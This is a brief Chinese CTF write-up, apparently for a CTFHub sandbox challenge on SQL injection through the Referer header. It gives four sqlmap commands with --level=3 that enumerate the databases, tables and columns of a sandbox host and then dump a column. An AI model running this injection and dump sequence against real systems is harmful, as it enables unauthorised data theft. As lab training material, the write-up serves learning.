进入页面,发现要在 Referer 输入 ID:

1.png

我们在 Brupsuite 的 Repeater 里修改请求头:

2.png

我们使用 SQLMap 完成自动化注入,使用--level=3(会测试 User-Agent 和 Referer 头注入)。

查询数据库信息

  1. sqlmap -u "http://challenge-908e834a3b804c84.sandbox.ctfhub.com:10800/" --batch --threads 4 --level=3 --dbs

3.png

我们关注sqli这个数据库。

查询数据库中的表

  1. sqlmap -u "http://challenge-908e834a3b804c84.sandbox.ctfhub.com:10800/" --batch --threads 4 --level=3 -D sqli --tables

4.png

我们关注nphuaaeddy这张表。

查询表结构

  1. sqlmap -u "http://challenge-908e834a3b804c84.sandbox.ctfhub.com:10800/" --batch --threads 4 --level=3 -D sqli -T nphuaaeddy --columns

5.png

该表只有 1 个字段,名为kudikpodoo

查询表里的记录

  1. sqlmap -u "http://challenge-908e834a3b804c84.sandbox.ctfhub.com:10800/" --batch --threads 4 --level=3 -D sqli -T nphuaaeddy -C kudikpodoo --dump

6.png